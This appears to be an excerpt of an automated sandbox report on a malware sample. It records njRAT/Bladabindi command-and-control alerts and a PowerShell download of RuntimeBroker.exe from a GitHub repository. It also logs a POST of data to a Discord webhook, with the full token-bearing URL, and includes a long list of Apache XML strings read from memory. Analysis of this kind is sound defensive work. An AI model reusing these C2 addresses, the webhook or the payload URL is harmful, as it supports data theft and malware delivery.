Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h		3_2_07F9B248
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h		3_2_07F9B244

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2033132 - Severity 1 - ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll) : 192.168.2.4:49732 -> 46.121.250.34:7777
Source: Network traffic	Suricata IDS: 2021176 - Severity 1 - ET MALWARE Bladabindi/njRAT CnC Command (ll) : 192.168.2.4:49732 -> 46.121.250.34:7777
Source: Network traffic	Suricata IDS: 2838486 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi Variant CnC Activity (inf) : 192.168.2.4:49732 -> 46.121.250.34:7777
Source: Network traffic	Suricata IDS: 2825566 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (CAP) : 192.168.2.4:49732 -> 46.121.250.34:7777

System process connects to network (likely due to code injection or exploit)

Source: C:\Users\user\AppData\Roaming\dllhost.exe

Network Connect: 46.121.250.34 7777

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.4:49732 -> 46.121.250.34:7777

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1352684770521387070/EnDdIPnq1Toz0toXGIhTo1T09Jq8MMJhXvjTWp5MjXqBLpdpS9QoPUThjc3XSnogFIz9 HTTP/1.1Content-Type: application/jsonHost: discordapp.comContent-Length: 77Expect: 100-continueConnection: Keep-Alive

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 140.82.113.4 140.82.113.4
Source: Joe Sandbox View	IP Address: 162.159.130.233 162.159.130.233
Source: Joe Sandbox View	IP Address: 162.159.130.233 162.159.130.233
Source: Joe Sandbox View	IP Address: 172.67.74.152 172.67.74.152
Source: Joe Sandbox View	IP Address: 172.67.74.152 172.67.74.152

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

May check the online IP address of the machine

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org

Suricata IDS alerts with low severity for network traffic

Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49726 -> 172.67.74.152:443
Source: Network traffic	Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49729 -> 140.82.113.4:443

Uses a known web browser user agent for HTTP communication

Source: global traffic

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET /AnonAm0369/am/raw/refs/heads/main/RuntimeBroker.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: github.comConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: api.ipify.org
Source: global traffic	DNS traffic detected: DNS query: discordapp.com
Source: global traffic	DNS traffic detected: DNS query: github.com
Source: global traffic	DNS traffic detected: DNS query: gabh.gotdns.ch

Source: unknown

Source: global traffic

Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/U3
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/allow-java-encodings
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/allow-java-encodingsler
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/continue-after-fatal-error
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/continue-after-fatal-errorLastChi=
Source: javaw.exe, 00000005.00000002.3696973585.0000000014D70000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/create-cdata-nodes
Source: javaw.exe, 00000005.00000002.3696973585.0000000014D70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/create-cdata-nodes:
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/disallow-doctype-decl
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/disallow-doctype-decln
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/disallow-doctype-declna
Source: javaw.exe, 00000005.00000002.3696973585.0000000014D70000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/dom/create-entity-ref-nodes
Source: javaw.exe, 00000005.00000002.3696973585.0000000014D70000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/dom/defer-node-expansion
Source: javaw.exe, 00000005.00000002.3696973585.0000000014D70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/dom/defer-node-expansion9
Source: javaw.exe, 00000005.00000002.3696973585.0000000014D70000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/dom/include-ignorable-whitespace
Source: javaw.exe, 00000005.00000002.3696973585.0000000014D70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/dom/include-ignorable-whitespace/
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/generate-synthetic-annotations
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/generate-synthetic-annotationsme
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/honour-all-schemaLocations
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/honour-all-schemaLocationsNodeVal;
Source: javaw.exe, 00000005.00000002.3696973585.0000000014D70000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/include-comments
Source: javaw.exe, 00000005.00000002.3696973585.0000000014D70000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/internal/parser-settings
Source: javaw.exe, 00000005.00000002.3696973585.0000000014D70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/internal/parser-settings7
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/internal/tolerate-duplicates
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/internal/tolerate-duplicatesling
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/internal/validation/schema/use-grammar-pool-only
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/internal/validation/schema/use-grammar-pool-onlyy/
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/namespace-growth
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/namespace-growthh
Source: javaw.exe, javaw.exe, 00000005.00000003.1360100051.000000001528E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.3302081083.0000000015294000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1355684652.0000000015204000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3698035742.0000000015292000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1558573934.0000000015294000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358921734.000000001525E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1510520893.0000000015294000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/namespaces
Source: javaw.exe, 00000005.00000003.1360100051.000000001528E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.3302081083.0000000015294000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1355684652.0000000015204000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3698035742.0000000015292000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1558573934.0000000015294000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358921734.000000001525E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1510520893.0000000015294000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/namespacesA
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/nonvalidating/load-external-dtd
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/nonvalidating/load-external-dtdte:
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/scanner/notify-builtin-refs
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/scanner/notify-builtin-refsf-node7
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/scanner/notify-char-refs
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/scanner/notify-char-refst3
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/standard-uri-conformant
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validate-annotations
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validate-annotationsce
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/balance-syntax-trees
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/balance-syntax-treeskN1
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/dynamic
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/dynamicrnal/im
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/id-idref-checking
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/id-idref-checking/xml/F
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/identity-constraint-checking
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/identity-constraint-checkingum
Source: javaw.exe, 00000005.00000002.3696973585.0000000014D70000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/schema
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/schema-full-checking
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/schema-full-checkingor=
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/schema/augment-psvi
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/schema/augment-psvispa
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/schema/element-default
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/schema/element-defaultO
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/schema/ignore-xsi-type-until-elemdecl
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/schema/ignore-xsi-type-until-elemdeclnA
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/schema/normalized-value
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/schema/normalized-valueang/IllB
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/unparsed-entity-checking
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/unparsed-entity-checkingva/lanB
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/warn-on-duplicate-attdef
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/warn-on-duplicate-attdefutil/SD
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/warn-on-undeclared-elemdef
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/warn-on-undeclared-elemdefniti:
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/warn-on-duplicate-entitydef
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/warn-on-duplicate-entitydef/w3c/d
Source: javaw.exe, 00000005.00000002.3696973585.0000000014D70000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/xinclude
Source: javaw.exe, 00000005.00000002.3696973585.0000000014D70000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/xinclude/fixup-base-uris
Source: javaw.exe, 00000005.00000002.3696973585.0000000014D70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/xinclude/fixup-base-uris6
Source: javaw.exe, 00000005.00000002.3696973585.0000000014D70000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/xinclude/fixup-language
Source: javaw.exe, 00000005.00000002.3696973585.0000000014D70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/xinclude/fixup-language;
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/dom/current-element-node
Source: javaw.exe, 00000005.00000002.3696973585.0000000014D70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/dom/current-element-nodeU
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/dom/document-class-name
Source: javaw.exe, 00000005.00000002.3696973585.0000000014D70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/dom/document-class-name$
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/input-buffer-size
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/datatype-validator-factory
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/datatype-validator-factoryDocu:
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/document-scanner
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/document-scanner/w3c/d7
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/dtd-processor
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/dtd-processor/5
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/dtd-scanner
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/dtd-scannerm/l8
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/entity-manager
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/entity-manager8
Source: javaw.exe, 00000005.00000002.3696973585.0000000014D70000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/entity-resolver
Source: javaw.exe, 00000005.00000002.3696973585.0000000014D70000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/error-handler
Source: javaw.exe, 00000005.00000002.3696973585.0000000014D70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/error-handler6
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/error-reporter
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/error-reporter:
Source: javaw.exe, 00000005.00000002.3696973585.0000000014D70000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/grammar-pool
Source: javaw.exe, 00000005.00000002.3696973585.0000000014D70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/grammar-pool6
